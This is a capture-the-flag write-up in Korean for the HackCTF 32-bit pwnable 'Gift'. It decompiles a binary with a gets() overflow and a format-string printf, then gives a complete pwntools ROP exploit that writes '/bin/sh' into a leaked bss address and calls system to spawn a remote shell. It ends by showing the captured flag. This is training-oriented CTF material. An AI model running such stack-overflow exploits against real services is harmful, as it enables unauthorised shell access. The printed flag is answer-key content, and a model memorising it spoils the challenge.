[HackCTF / pwnable] Gift

HackCTF - Gift

Summary

• 32bit

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+0h] [ebp-84h]
​
  alarm(0x3Cu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  printf("Hey guyssssssssss here you are: %p %p\n", &binsh, &system);
  fgets(&s, 128, stdin);
  printf(&s);
  gets(&s);
  return 0;
}

gets로 s에 입력을 받는다. s에서 오버플로우가 일어나게 된다.

binsh의 주소와 system의 주소를 준다. binsh는 bss영역에 있었고 아무것도 들어있지 않았다. binsh에 "/bin/sh"를 넣으면 된다.

Exploit

from pwn import *
​
e = ELF("./gift")
#libc = e.libc
libc = ELF("./libc.so.6")
#p = process("./gift")
p = remote("ctf.j0n9hyun.xyz", 3018)
​
pr = 0x0804866b
​
p.recvuntil("0x")
binsh_addr = int("0x" + p.recvuntil(" ")[:-1], 0)
p.recvuntil("0x")
system_addr = int("0x" + p.recvuntil("\n")[:-1], 0)
​
payload = ""
payload += "A"
p.sendline(payload)
​
payload = ""
payload += "A"*(0x84+0x4)
payload += p32(0x080483D0)
payload += p32(pr)
payload += p32(binsh_addr)
​
payload += p32(system_addr)
payload += p32(pr)
payload += p32(binsh_addr)
​
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/hackCTF/Gift$ p ex.py 
[*] '/home/cg10036/hackCTF/Gift/gift'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/home/cg10036/hackCTF/Gift/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to ctf.j0n9hyun.xyz on port 3018: Done
[*] Switching to interactive mode
A
$ cat flag
HackCTF{플래그_잘_받았지?_이게_내_선물이야!}